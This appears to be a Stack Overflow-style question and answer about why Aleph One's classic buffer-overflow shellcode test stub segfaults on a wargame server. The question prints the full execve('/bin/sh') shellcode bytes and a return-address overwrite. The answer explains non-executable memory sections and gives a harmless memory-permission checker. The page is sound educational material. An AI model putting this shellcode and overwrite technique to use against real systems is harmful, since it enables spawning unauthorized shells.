I have been trying to run Aleph One's example to get a BOF and open a shell.
This is the Aleph One paper: http://insecure.org/stf/smashstack.html
This is the simple C code (roughly halfway through the paper):
/* Aleph One's test stub: the shellcode runs execve("/bin/sh") and then exit()
 * through int 0x80; main overwrites its own saved return address with the
 * array's address so that returning from main jumps into it. */
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
"\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
void main() {
int *ret;
ret = (int *)&ret + 2;    /* assumes the saved return address is 2 words above ret */
(*ret) = (int)shellcode;  /* overwrite it with the address of the shellcode array */
}
Now, I tried running this program in an SSH bash session, without success.
Since nothing happened after running it, I guessed I simply wasn't writing the return address, so I used GDB to look at the offset between the ret variable and the actual return address, and found it was 7.
To check myself, I tried incrementing ret by 3, 4, 5 and 6, and indeed, only when I changed line 10 to:
ret = (int *)&ret + 7;
did I get a segmentation fault.
However, I don't understand why bash didn't open and this error appeared instead.
P.S. I am running on the "logic smashthestack" SSH server (one of their challenges is a BOF): http://logic.smashthestack.org:88/
Thanks to anyone who helps.
Best answer
From http://blog.markloiseau.com/2012/06/64-bit-linux-shellcode/ :
This stub is an updated version of the classic shellcode test stub, with one key difference: In the new stub, the shellcode is #defined at compile-time so it can be placed directly into the main routine by gcc’s preprocessor.
This is necessary because over time, Linux and GCC have become much more cautious about which sections of an executable file can contain executable code (opposed to non-executable variables). The traditional version of the program won’t work on newer versions of Linux:
The classic shellcode C stub will generate a segfault on newer systems because the shellcode[] character array is stored in the explicitly non-executable .rodata section of the ELF file. When the computer recasts the non-executable array as a function and tries to run it, the program crashes.
Also note these changes to how the shellcode is written:
// old way: a global array, placed in a data section of the ELF file
char shellcode[] = "shellcode...";
// new way: a preprocessor macro, so the bytes can be placed inside main by gcc's preprocessor
#define SHELLCODE "shellcode..."
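The answer comes down to the mapping permissions of the page that holds the array. As an added example (not from the question or the quoted blog), here is a Linux check that reads /proc/self/maps and reports whether a given address lies in an executable mapping; the function is_executable_addr and the constructed data_blob array are my own names, and the blob is plain bytes, not shellcode.

```c
#include <stdio.h>
#include <stdint.h>

/* Constructed sample global array: ordinary data bytes, not real shellcode.
 * With default gcc/ld settings it lands in a writable, non-executable segment. */
char data_blob[] = "\x90\x90\x90\xc3";

/* Return 1 if the page containing addr is mapped with the x permission in
 * this process, 0 if it is mapped without x, and -1 if the address is not
 * mapped or /proc/self/maps cannot be read (Linux-specific). */
int is_executable_addr(const void *addr)
{
    FILE *maps = fopen("/proc/self/maps", "r");
    if (!maps)
        return -1;

    uintptr_t target = (uintptr_t)addr;
    char line[512];
    int result = -1;

    /* Each line looks like: start-end perms offset dev inode [path] */
    while (fgets(line, sizeof line, maps)) {
        unsigned long start, end;
        char perms[5];
        if (sscanf(line, "%lx-%lx %4s", &start, &end, perms) != 3)
            continue;
        if (target >= start && target < end) {
            result = (perms[2] == 'x') ? 1 : 0;  /* perms is e.g. "r-xp" */
            break;
        }
    }
    fclose(maps);
    return result;
}

int main(void)
{
    int code = is_executable_addr((const void *)is_executable_addr);
    int data = is_executable_addr(data_blob);
    printf("code of is_executable_addr: %s\n", code == 1 ? "executable" : "not executable");
    printf("global data_blob array:     %s\n", data == 1 ? "executable" : "not executable");
    return 0;
}
```

On an NX-enforcing system the function's page reports executable and the array's page does not, which is exactly the condition under which jumping into the array faults instead of running it.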
Regarding "c - simple buffer overflow and shellcode example", we found a similar question on Stack Overflow: https://stackoverflow.com/questions/20431174/